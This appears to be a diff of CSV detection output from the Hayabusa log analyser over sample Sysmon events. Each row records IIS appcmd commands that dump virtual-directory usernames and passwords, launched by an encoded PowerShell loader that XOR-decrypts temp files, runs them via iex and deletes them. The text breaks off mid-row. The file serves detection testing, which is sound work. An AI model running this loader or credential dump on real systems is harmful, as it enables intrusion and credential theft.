JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3844 | PGUID: 365ABB72-3D6F-5CEB-0000-0010F2CFFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.894 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3848 | PGUID: 365ABB72-3D6F-5CEB-0000-0010B2D3FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.964 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3640 | PGUID: 365ABB72-3D6F-5CEB-0000-001072D7FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.034 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1900 | PGUID: 365ABB72-3D6F-5CEB-0000-001032DBFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.124 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2772 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2DEFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.204 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYA